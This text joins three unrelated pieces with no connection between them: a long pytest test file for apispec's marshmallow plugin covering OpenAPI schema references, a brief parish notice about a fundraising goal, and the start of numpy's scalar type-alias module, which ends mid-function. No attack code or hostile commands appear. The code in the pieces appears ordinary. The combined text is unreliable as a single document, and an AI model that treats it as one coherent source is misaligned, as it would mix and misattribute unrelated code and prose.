def test_warning_when_schema_added_twice(self, spec, schema):
spec.components.schema("Analysis", schema=schema)
with pytest.warns(UserWarning, match="has already been added to the spec"):
spec.components.schema("DuplicateAnalysis", schema=schema)
def test_schema_instances_with_different_modifiers_added(self, spec):
class MultiModifierSchema(Schema):
pet_unmodified = Nested(PetSchema)
pet_exclude = Nested(PetSchema, exclude=("name",))
spec.components.schema("Pet", schema=PetSchema())
spec.components.schema("Pet_Exclude", schema=PetSchema(exclude=("name",)))
spec.components.schema("MultiModifierSchema", schema=MultiModifierSchema)
definitions = get_schemas(spec)
pet_unmodified_ref = definitions["MultiModifierSchema"]["properties"][
"pet_unmodified"
]
assert pet_unmodified_ref == build_ref(spec, "schema", "Pet")
pet_exclude = definitions["MultiModifierSchema"]["properties"]["pet_exclude"]
assert pet_exclude == build_ref(spec, "schema", "Pet_Exclude")
def test_schema_instance_with_different_modifers_custom_resolver(self):
class MultiModifierSchema(Schema):
pet_unmodified = Nested(PetSchema)
pet_exclude = Nested(PetSchema(partial=True))
def resolver(schema):
schema_instance = common.resolve_schema_instance(schema)
prefix = "Partial-" if schema_instance.partial else ""
schema_cls = common.resolve_schema_cls(schema)
name = prefix + schema_cls.__name__
if name.endswith("Schema"):
return name[:-6] or name
return name
spec = APISpec(
title="Test Custom Resolver for Partial",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.warns(None) as record:
spec.components.schema("NameClashSchema", schema=MultiModifierSchema)
assert len(record) == 0
def test_schema_with_clashing_names(self, spec):
class Pet(PetSchema):
another_field = String()
class NameClashSchema(Schema):
pet_1 = Nested(PetSchema)
pet_2 = Nested(Pet)
with pytest.warns(
UserWarning, match="Multiple schemas resolved to the name Pet"
):
spec.components.schema("NameClashSchema", schema=NameClashSchema)
definitions = get_schemas(spec)
assert "Pet" in definitions
assert "Pet1" in definitions
def test_resolve_nested_schema_many_true_resolver_return_none(self):
def resolver(schema):
return None
class PetFamilySchema(Schema):
pets_1 = Nested(PetSchema, many=True)
pets_2 = List(Nested(PetSchema))
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.components.schema("PetFamily", schema=PetFamilySchema)
props = get_schemas(spec)["PetFamily"]["properties"]
pets_1 = props["pets_1"]
pets_2 = props["pets_2"]
assert pets_1["type"] == pets_2["type"] == "array"
class TestComponentParameterHelper:
@pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
def test_can_use_schema_in_parameter(self, spec, schema):
if spec.openapi_version.major < 3:
param = {"schema": schema}
else:
param = {"content": {"application/json": {"schema": schema}}}
spec.components.parameter("Pet", "body", param)
parameter = get_parameters(spec)["Pet"]
assert parameter["in"] == "body"
if spec.openapi_version.major < 3:
reference = parameter["schema"]
else:
reference = parameter["content"]["application/json"]["schema"]
assert reference == build_ref(spec, "schema", "Pet")
resolved_schema = spec.components.schemas["Pet"]
assert resolved_schema["properties"]["name"]["type"] == "string"
assert resolved_schema["properties"]["password"]["type"] == "string"
assert resolved_schema["properties"]["id"]["type"] == "integer"
class TestComponentResponseHelper:
@pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
def test_can_use_schema_in_response(self, spec, schema):
if spec.openapi_version.major < 3:
resp = {"schema": schema}
else:
resp = {"content": {"application/json": {"schema": schema}}}
spec.components.response("GetPetOk", resp)
response = get_responses(spec)["GetPetOk"]
if spec.openapi_version.major < 3:
reference = response["schema"]
else:
reference = response["content"]["application/json"]["schema"]
assert reference == build_ref(spec, "schema", "Pet")
resolved_schema = spec.components.schemas["Pet"]
assert resolved_schema["properties"]["id"]["type"] == "integer"
assert resolved_schema["properties"]["name"]["type"] == "string"
assert resolved_schema["properties"]["password"]["type"] == "string"
@pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
def test_can_use_schema_in_response_header(self, spec, schema):
resp = {"headers": {"PetHeader": {"schema": schema}}}
spec.components.response("GetPetOk", resp)
response = get_responses(spec)["GetPetOk"]
reference = response["headers"]["PetHeader"]["schema"]
assert reference == build_ref(spec, "schema", "Pet")
resolved_schema = spec.components.schemas["Pet"]
assert resolved_schema["properties"]["id"]["type"] == "integer"
assert resolved_schema["properties"]["name"]["type"] == "string"
assert resolved_schema["properties"]["password"]["type"] == "string"
@pytest.mark.parametrize("spec", ("3.0.0",), indirect=True)
def test_content_without_schema(self, spec):
resp = {"content": {"application/json": {"example": {"name": "Example"}}}}
spec.components.response("GetPetOk", resp)
response = get_responses(spec)["GetPetOk"]
assert response == resp
class TestCustomField:
def test_can_use_custom_field_decorator(self, spec_fixture):
@spec_fixture.marshmallow_plugin.map_to_openapi_type(DateTime)
class CustomNameA(Field):
pass
@spec_fixture.marshmallow_plugin.map_to_openapi_type("integer", "int32")
class CustomNameB(Field):
pass
with pytest.raises(TypeError):
@spec_fixture.marshmallow_plugin.map_to_openapi_type("integer")
class BadCustomField(Field):
pass
class CustomPetASchema(PetSchema):
name = CustomNameA()
class CustomPetBSchema(PetSchema):
name = CustomNameB()
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.components.schema("CustomPetA", schema=CustomPetASchema)
spec_fixture.spec.components.schema("CustomPetB", schema=CustomPetBSchema)
props_0 = get_schemas(spec_fixture.spec)["Pet"]["properties"]
props_a = get_schemas(spec_fixture.spec)["CustomPetA"]["properties"]
props_b = get_schemas(spec_fixture.spec)["CustomPetB"]["properties"]
assert props_0["name"]["type"] == "string"
assert "format" not in props_0["name"]
assert props_a["name"]["type"] == "string"
assert props_a["name"]["format"] == "date-time"
assert props_b["name"]["type"] == "integer"
assert props_b["name"]["format"] == "int32"
def get_nested_schema(schema, field_name):
try:
return schema._declared_fields[field_name]._schema
except AttributeError:
return schema._declared_fields[field_name]._Nested__schema
class TestOperationHelper:
@pytest.fixture
def make_pet_callback_spec(self, spec_fixture):
def _make_pet_spec(operations):
spec_fixture.spec.path(
path="/pet",
operations={
"post": {"callbacks": {"petEvent": {"petCallbackUrl": operations}}}
},
)
return spec_fixture
return _make_pet_spec
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), PetSchema(many=True), "tests.schemas.PetSchema"),
)
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_v2(self, spec_fixture, pet_schema):
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {
"schema": pet_schema,
"description": "successful operation",
"headers": {"PetHeader": {"schema": pet_schema}},
}
}
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
if isinstance(pet_schema, Schema) and pet_schema.many is True:
assert get["responses"]["200"]["schema"]["type"] == "array"
schema_reference = get["responses"]["200"]["schema"]["items"]
assert (
get["responses"]["200"]["headers"]["PetHeader"]["schema"]["type"]
== "array"
)
header_reference = get["responses"]["200"]["headers"]["PetHeader"][
"schema"
]["items"]
else:
schema_reference = get["responses"]["200"]["schema"]
header_reference = get["responses"]["200"]["headers"]["PetHeader"]["schema"]
assert schema_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert header_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert len(spec_fixture.spec.components.schemas) == 1
resolved_schema = spec_fixture.spec.components.schemas["Pet"]
assert resolved_schema == spec_fixture.openapi.schema2jsonschema(PetSchema)
assert get["responses"]["200"]["description"] == "successful operation"
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), PetSchema(many=True), "tests.schemas.PetSchema"),
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_v3(self, spec_fixture, pet_schema):
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {
"content": {"application/json": {"schema": pet_schema}},
"description": "successful operation",
"headers": {"PetHeader": {"schema": pet_schema}},
}
}
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
if isinstance(pet_schema, Schema) and pet_schema.many is True:
assert (
get["responses"]["200"]["content"]["application/json"]["schema"]["type"]
== "array"
)
schema_reference = get["responses"]["200"]["content"]["application/json"][
"schema"
]["items"]
assert (
get["responses"]["200"]["headers"]["PetHeader"]["schema"]["type"]
== "array"
)
header_reference = get["responses"]["200"]["headers"]["PetHeader"][
"schema"
]["items"]
else:
schema_reference = get["responses"]["200"]["content"]["application/json"][
"schema"
]
header_reference = get["responses"]["200"]["headers"]["PetHeader"]["schema"]
assert schema_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert header_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert len(spec_fixture.spec.components.schemas) == 1
resolved_schema = spec_fixture.spec.components.schemas["Pet"]
assert resolved_schema == spec_fixture.openapi.schema2jsonschema(PetSchema)
assert get["responses"]["200"]["description"] == "successful operation"
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), PetSchema(many=True), "tests.schemas.PetSchema"),
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_v3(self, make_pet_callback_spec, pet_schema):
spec_fixture = make_pet_callback_spec(
{
"get": {
"responses": {
"200": {
"content": {"application/json": {"schema": pet_schema}},
"description": "successful operation",
"headers": {"PetHeader": {"schema": pet_schema}},
}
}
}
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
if isinstance(pet_schema, Schema) and pet_schema.many is True:
assert (
get["responses"]["200"]["content"]["application/json"]["schema"]["type"]
== "array"
)
schema_reference = get["responses"]["200"]["content"]["application/json"][
"schema"
]["items"]
assert (
get["responses"]["200"]["headers"]["PetHeader"]["schema"]["type"]
== "array"
)
header_reference = get["responses"]["200"]["headers"]["PetHeader"][
"schema"
]["items"]
else:
schema_reference = get["responses"]["200"]["content"]["application/json"][
"schema"
]
header_reference = get["responses"]["200"]["headers"]["PetHeader"]["schema"]
assert schema_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert header_reference == build_ref(spec_fixture.spec, "schema", "Pet")
assert len(spec_fixture.spec.components.schemas) == 1
resolved_schema = spec_fixture.spec.components.schemas["Pet"]
assert resolved_schema == spec_fixture.openapi.schema2jsonschema(PetSchema)
assert get["responses"]["200"]["description"] == "successful operation"
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_expand_parameters_v2(self, spec_fixture):
spec_fixture.spec.path(
path="/pet",
operations={
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"parameters": [
{
"in": "body",
"description": "a pet schema",
"required": True,
"name": "pet",
"schema": PetSchema,
}
]
},
},
)
p = get_paths(spec_fixture.spec)["/pet"]
get = p["get"]
assert get["parameters"] == spec_fixture.openapi.schema2parameters(
PetSchema(), location="query"
)
post = p["post"]
assert post["parameters"] == spec_fixture.openapi.schema2parameters(
PetSchema,
location="body",
required=True,
name="pet",
description="a pet schema",
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_expand_parameters_v3(self, spec_fixture):
spec_fixture.spec.path(
path="/pet",
operations={
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"requestBody": {
"description": "a pet schema",
"required": True,
"content": {"application/json": {"schema": PetSchema}},
}
},
},
)
p = get_paths(spec_fixture.spec)["/pet"]
get = p["get"]
assert get["parameters"] == spec_fixture.openapi.schema2parameters(
PetSchema(), location="query"
)
for parameter in get["parameters"]:
description = parameter.get("description", False)
assert description
name = parameter["name"]
assert description == PetSchema.description[name]
post = p["post"]
post_schema = spec_fixture.marshmallow_plugin.resolver.resolve_schema_dict(
PetSchema
)
assert (
post["requestBody"]["content"]["application/json"]["schema"] == post_schema
)
assert post["requestBody"]["description"] == "a pet schema"
assert post["requestBody"]["required"]
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_expand_parameters_v3(self, make_pet_callback_spec):
spec_fixture = make_pet_callback_spec(
{
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"requestBody": {
"description": "a pet schema",
"required": True,
"content": {"application/json": {"schema": PetSchema}},
}
},
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert get["parameters"] == spec_fixture.openapi.schema2parameters(
PetSchema(), location="query"
)
for parameter in get["parameters"]:
description = parameter.get("description", False)
assert description
name = parameter["name"]
assert description == PetSchema.description[name]
post = c["post"]
post_schema = spec_fixture.marshmallow_plugin.resolver.resolve_schema_dict(
PetSchema
)
assert (
post["requestBody"]["content"]["application/json"]["schema"] == post_schema
)
assert post["requestBody"]["description"] == "a pet schema"
assert post["requestBody"]["required"]
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_uses_ref_if_available_v2(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet", operations={"get": {"responses": {200: {"schema": PetSchema}}}}
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
assert get["responses"]["200"]["schema"] == build_ref(
spec_fixture.spec, "schema", "Pet"
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_uses_ref_if_available_v3(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {"content": {"application/json": {"schema": PetSchema}}}
}
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
assert get["responses"]["200"]["content"]["application/json"][
"schema"
] == build_ref(spec_fixture.spec, "schema", "Pet")
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_uses_ref_if_available_v3(self, make_pet_callback_spec):
spec_fixture = make_pet_callback_spec(
{
"get": {
"responses": {
"200": {"content": {"application/json": {"schema": PetSchema}}}
}
}
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert get["responses"]["200"]["content"]["application/json"][
"schema"
] == build_ref(spec_fixture.spec, "schema", "Pet")
def test_schema_uses_ref_if_available_name_resolver_returns_none_v2(self):
def resolver(schema):
return None
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.components.schema("Pet", schema=PetSchema)
spec.path(
path="/pet", operations={"get": {"responses": {200: {"schema": PetSchema}}}}
)
get = get_paths(spec)["/pet"]["get"]
assert get["responses"]["200"]["schema"] == build_ref(spec, "schema", "Pet")
def test_schema_uses_ref_if_available_name_resolver_returns_none_v3(self):
def resolver(schema):
return None
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="3.0.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.components.schema("Pet", schema=PetSchema)
spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {"content": {"application/json": {"schema": PetSchema}}}
}
}
},
)
get = get_paths(spec)["/pet"]["get"]
assert get["responses"]["200"]["content"]["application/json"][
"schema"
] == build_ref(spec, "schema", "Pet")
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), "tests.schemas.PetSchema"),
)
def test_schema_name_resolver_returns_none_v2(self, pet_schema):
def resolver(schema):
return None
spec = APISpec(
title="Test resolver returns None",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.path(
path="/pet",
operations={"get": {"responses": {200: {"schema": pet_schema}}}},
)
get = get_paths(spec)["/pet"]["get"]
assert "properties" in get["responses"]["200"]["schema"]
@pytest.mark.parametrize(
"pet_schema",
(PetSchema, PetSchema(), "tests.schemas.PetSchema"),
)
def test_schema_name_resolver_returns_none_v3(self, pet_schema):
def resolver(schema):
return None
spec = APISpec(
title="Test resolver returns None",
version="0.1",
openapi_version="3.0.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.path(
path="/pet",
operations={
"get": {
"responses": {
200: {"content": {"application/json": {"schema": pet_schema}}}
}
}
},
)
get = get_paths(spec)["/pet"]["get"]
assert (
"properties"
in get["responses"]["200"]["content"]["application/json"]["schema"]
)
def test_callback_schema_uses_ref_if_available_name_resolver_returns_none_v3(self):
def resolver(schema):
return None
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="3.0.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
spec.components.schema("Pet", schema=PetSchema)
spec.path(
path="/pet",
operations={
"post": {
"callbacks": {
"petEvent": {
"petCallbackUrl": {
"get": {
"responses": {
"200": {
"content": {
"application/json": {
"schema": PetSchema
}
}
}
}
}
}
}
}
}
},
)
p = get_paths(spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert get["responses"]["200"]["content"]["application/json"][
"schema"
] == build_ref(spec, "schema", "Pet")
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_uses_ref_in_parameters_and_request_body_if_available_v2(
self, spec_fixture
):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {"parameters": [{"in": "body", "schema": PetSchema}]},
},
)
p = get_paths(spec_fixture.spec)["/pet"]
assert "schema" not in p["get"]["parameters"][0]
post = p["post"]
assert len(post["parameters"]) == 1
assert post["parameters"][0]["schema"] == build_ref(
spec_fixture.spec, "schema", "Pet"
)
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_uses_ref_in_parameters_and_request_body_if_available_v3(
self, spec_fixture
):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"requestBody": {
"content": {"application/json": {"schema": PetSchema}}
}
},
},
)
p = get_paths(spec_fixture.spec)["/pet"]
assert "schema" in p["get"]["parameters"][0]
post = p["post"]
schema_ref = post["requestBody"]["content"]["application/json"]["schema"]
assert schema_ref == build_ref(spec_fixture.spec, "schema", "Pet")
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_uses_ref_in_parameters_and_request_body_if_available_v3(
self, make_pet_callback_spec
):
spec_fixture = make_pet_callback_spec(
{
"get": {"parameters": [{"in": "query", "schema": PetSchema}]},
"post": {
"requestBody": {
"content": {"application/json": {"schema": PetSchema}}
}
},
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
assert "schema" in c["get"]["parameters"][0]
post = c["post"]
schema_ref = post["requestBody"]["content"]["application/json"]["schema"]
assert schema_ref == build_ref(spec_fixture.spec, "schema", "Pet")
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_array_uses_ref_if_available_v2(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"parameters": [
{
"name": "petSchema",
"in": "body",
"schema": {"type": "array", "items": PetSchema},
}
],
"responses": {
200: {"schema": {"type": "array", "items": PetSchema}}
},
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
assert len(get["parameters"]) == 1
resolved_schema = {
"type": "array",
"items": build_ref(spec_fixture.spec, "schema", "Pet"),
}
assert get["parameters"][0]["schema"] == resolved_schema
assert get["responses"]["200"]["schema"] == resolved_schema
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_array_uses_ref_if_available_v3(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/pet",
operations={
"get": {
"parameters": [
{
"name": "Pet",
"in": "query",
"content": {
"application/json": {
"schema": {"type": "array", "items": PetSchema}
}
},
}
],
"responses": {
200: {
"content": {
"application/json": {
"schema": {"type": "array", "items": PetSchema}
}
}
}
},
}
},
)
get = get_paths(spec_fixture.spec)["/pet"]["get"]
assert len(get["parameters"]) == 1
resolved_schema = {
"type": "array",
"items": build_ref(spec_fixture.spec, "schema", "Pet"),
}
request_schema = get["parameters"][0]["content"]["application/json"]["schema"]
assert request_schema == resolved_schema
response_schema = get["responses"]["200"]["content"]["application/json"][
"schema"
]
assert response_schema == resolved_schema
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_array_uses_ref_if_available_v3(
self, make_pet_callback_spec
):
spec_fixture = make_pet_callback_spec(
{
"get": {
"parameters": [
{
"name": "Pet",
"in": "query",
"content": {
"application/json": {
"schema": {"type": "array", "items": PetSchema}
}
},
}
],
"responses": {
"200": {
"content": {
"application/json": {
"schema": {"type": "array", "items": PetSchema}
}
}
}
},
}
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert len(get["parameters"]) == 1
resolved_schema = {
"type": "array",
"items": build_ref(spec_fixture.spec, "schema", "Pet"),
}
request_schema = get["parameters"][0]["content"]["application/json"]["schema"]
assert request_schema == resolved_schema
response_schema = get["responses"]["200"]["content"]["application/json"][
"schema"
]
assert response_schema == resolved_schema
@pytest.mark.parametrize("spec_fixture", ("2.0",), indirect=True)
def test_schema_partially_v2(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/parents",
operations={
"get": {
"responses": {
200: {
"schema": {
"type": "object",
"properties": {
"mother": PetSchema,
"father": PetSchema,
},
}
}
}
}
},
)
get = get_paths(spec_fixture.spec)["/parents"]["get"]
assert get["responses"]["200"]["schema"] == {
"type": "object",
"properties": {
"mother": build_ref(spec_fixture.spec, "schema", "Pet"),
"father": build_ref(spec_fixture.spec, "schema", "Pet"),
},
}
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_schema_partially_v3(self, spec_fixture):
spec_fixture.spec.components.schema("Pet", schema=PetSchema)
spec_fixture.spec.path(
path="/parents",
operations={
"get": {
"responses": {
200: {
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"mother": PetSchema,
"father": PetSchema,
},
}
}
}
}
}
}
},
)
get = get_paths(spec_fixture.spec)["/parents"]["get"]
assert get["responses"]["200"]["content"]["application/json"]["schema"] == {
"type": "object",
"properties": {
"mother": build_ref(spec_fixture.spec, "schema", "Pet"),
"father": build_ref(spec_fixture.spec, "schema", "Pet"),
},
}
@pytest.mark.parametrize("spec_fixture", ("3.0.0",), indirect=True)
def test_callback_schema_partially_v3(self, make_pet_callback_spec):
spec_fixture = make_pet_callback_spec(
{
"get": {
"responses": {
"200": {
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"mother": PetSchema,
"father": PetSchema,
},
}
}
}
}
}
}
}
)
p = get_paths(spec_fixture.spec)["/pet"]
c = p["post"]["callbacks"]["petEvent"]["petCallbackUrl"]
get = c["get"]
assert get["responses"]["200"]["content"]["application/json"]["schema"] == {
"type": "object",
"properties": {
"mother": build_ref(spec_fixture.spec, "schema", "Pet"),
"father": build_ref(spec_fixture.spec, "schema", "Pet"),
},
}
def test_parameter_reference(self, spec_fixture):
if spec_fixture.spec.openapi_version.major < 3:
param = {"schema": PetSchema}
else:
param = {"content": {"application/json": {"schema": PetSchema}}}
spec_fixture.spec.components.parameter("Pet", "body", param)
spec_fixture.spec.path(
path="/parents", operations={"get": {"parameters": ["Pet"]}}
)
get = get_paths(spec_fixture.spec)["/parents"]["get"]
assert get["parameters"] == [build_ref(spec_fixture.spec, "parameter", "Pet")]
def test_response_reference(self, spec_fixture):
if spec_fixture.spec.openapi_version.major < 3:
resp = {"schema": PetSchema}
else:
resp = {"content": {"application/json": {"schema": PetSchema}}}
spec_fixture.spec.components.response("Pet", resp)
spec_fixture.spec.path(
path="/parents", operations={"get": {"responses": {"200": "Pet"}}}
)
get = get_paths(spec_fixture.spec)["/parents"]["get"]
assert get["responses"] == {
"200": build_ref(spec_fixture.spec, "response", "Pet")
}
def test_schema_global_state_untouched_2json(self, spec_fixture):
assert get_nested_schema(RunSchema, "sample") is None
data = spec_fixture.openapi.schema2jsonschema(RunSchema)
json.dumps(data)
assert get_nested_schema(RunSchema, "sample") is None
def test_schema_global_state_untouched_2parameters(self, spec_fixture):
assert get_nested_schema(RunSchema, "sample") is None
data = spec_fixture.openapi.schema2parameters(RunSchema, location="json")
json.dumps(data)
assert get_nested_schema(RunSchema, "sample") is None
def test_resolve_schema_dict_ref_as_string(self, spec):
schema = {"schema": "PetSchema"}
if spec.openapi_version.major >= 3:
schema = {"content": {"application/json": schema}}
spec.path("/pet/{petId}", operations={"get": {"responses": {"200": schema}}})
resp = get_paths(spec)["/pet/{petId}"]["get"]["responses"]["200"]
if spec.openapi_version.major < 3:
schema = resp["schema"]
else:
schema = resp["content"]["application/json"]["schema"]
assert schema == build_ref(spec, "schema", "PetSchema")
class TestCircularReference:
def test_circular_referencing_schemas(self, spec):
spec.components.schema("Analysis", schema=AnalysisSchema)
definitions = get_schemas(spec)
ref = definitions["Analysis"]["properties"]["sample"]
assert ref == build_ref(spec, "schema", "Sample")
# Regression tests for issue #55
class TestSelfReference:
def test_self_referencing_field_single(self, spec):
spec.components.schema("SelfReference", schema=SelfReferencingSchema)
definitions = get_schemas(spec)
ref = definitions["SelfReference"]["properties"]["single"]
assert ref == build_ref(spec, "schema", "SelfReference")
def test_self_referencing_field_many(self, spec):
spec.components.schema("SelfReference", schema=SelfReferencingSchema)
definitions = get_schemas(spec)
result = definitions["SelfReference"]["properties"]["many"]
assert result == {
"type": "array",
"items": build_ref(spec, "schema", "SelfReference"),
}
class TestOrderedSchema:
def test_ordered_schema(self, spec):
spec.components.schema("Ordered", schema=OrderedSchema)
result = get_schemas(spec)["Ordered"]["properties"]
assert list(result.keys()) == ["field1", "field2", "field3", "field4", "field5"]
class TestFieldWithCustomProps:
def test_field_with_custom_props(self, spec):
spec.components.schema("PatternedObject", schema=PatternedObjectSchema)
result = get_schemas(spec)["PatternedObject"]["properties"]["count"]
assert "x-count" in result
assert result["x-count"] == 1
def test_field_with_custom_props_passed_as_snake_case(self, spec):
spec.components.schema("PatternedObject", schema=PatternedObjectSchema)
result = get_schemas(spec)["PatternedObject"]["properties"]["count2"]
assert "x-count2" in result
assert result["x-count2"] == 2
class TestSchemaWithDefaultValues:
def test_schema_with_default_values(self, spec):
spec.components.schema("DefaultValuesSchema", schema=DefaultValuesSchema)
definitions = get_schemas(spec)
props = definitions["DefaultValuesSchema"]["properties"]
assert props["number_auto_default"]["default"] == 12
assert props["number_manual_default"]["default"] == 42
assert "default" not in props["string_callable_default"]
assert props["string_manual_default"]["default"] == "Manual"
assert "default" not in props["numbers"]
class TestDictValues:
def test_dict_values_resolve_to_additional_properties(self, spec):
class SchemaWithDict(Schema):
dict_field = Dict(values=String())
spec.components.schema("SchemaWithDict", schema=SchemaWithDict)
result = get_schemas(spec)["SchemaWithDict"]["properties"]["dict_field"]
assert result == {"type": "object", "additionalProperties": {"type": "string"}}
def test_dict_with_empty_values_field(self, spec):
class SchemaWithDict(Schema):
dict_field = Dict()
spec.components.schema("SchemaWithDict", schema=SchemaWithDict)
result = get_schemas(spec)["SchemaWithDict"]["properties"]["dict_field"]
assert result == {"type": "object"}
def test_dict_with_nested(self, spec):
class SchemaWithDict(Schema):
dict_field = Dict(values=Nested(PetSchema))
spec.components.schema("SchemaWithDict", schema=SchemaWithDict)
assert len(get_schemas(spec)) == 2
result = get_schemas(spec)["SchemaWithDict"]["properties"]["dict_field"]
assert result == {
"additionalProperties": build_ref(spec, "schema", "Pet"),
"type": "object",
}
class TestList:
def test_list_with_nested(self, spec):
class SchemaWithList(Schema):
list_field = List(Nested(PetSchema))
spec.components.schema("SchemaWithList", schema=SchemaWithList)
assert len(get_schemas(spec)) == 2
result = get_schemas(spec)["SchemaWithList"]["properties"]["list_field"]
assert result == {"items": build_ref(spec, "schema", "Pet"), "type": "array"}
class TestTimeDelta:
def test_timedelta_x_unit(self, spec):
class SchemaWithTimeDelta(Schema):
sec = TimeDelta("seconds")
day = TimeDelta("days")
spec.components.schema("SchemaWithTimeDelta", schema=SchemaWithTimeDelta)
assert (
get_schemas(spec)["SchemaWithTimeDelta"]["properties"]["sec"]["x-unit"]
== "seconds"
)
assert (
get_schemas(spec)["SchemaWithTimeDelta"]["properties"]["day"]["x-unit"]
== "days"
)
|
We surpassed our goal for this year! Thank you to all who have pledged. As of Aug 1, we are $2,274.15 over goal! You can continue to make pledges and contributions, every dollar over goal is returned to the parish tax-free so we can have the funds for the Youth Ministry, the re-surfacing of the PAC parking lot and for church painting expenses. |
"""
Due to compatibility, numpy has a very large number of different naming
conventions for the scalar types (those subclassing from `numpy.generic`).
This file produces a convoluted set of dictionaries mapping names to types,
and sometimes other mappings too.
.. data:: allTypes
A dictionary of names to types that will be exposed as attributes through
``np.core.numerictypes.*``
.. data:: sctypeDict
Similar to `allTypes`, but maps a broader set of aliases to their types.
.. data:: sctypes
A dictionary keyed by a "type group" string, providing a list of types
under that group.
"""
from numpy.compat import unicode
from numpy.core._string_helpers import english_lower
from numpy.core.multiarray import typeinfo, dtype
from numpy.core._dtype import _kind_name
sctypeDict = {} # Contains all leaf-node scalar types with aliases
allTypes = {} # Collect the types we will add to the module
# separate the actual type info from the abstract base classes
_abstract_types = {}
_concrete_typeinfo = {}
for k, v in typeinfo.items():
# make all the keys lowercase too
k = english_lower(k)
if isinstance(v, type):
_abstract_types[k] = v
else:
_concrete_typeinfo[k] = v
_concrete_types = {v.type for k, v in _concrete_typeinfo.items()}
def _bits_of(obj):
try:
info = next(v for v in _concrete_typeinfo.values() if v.type is obj)
except StopIteration:
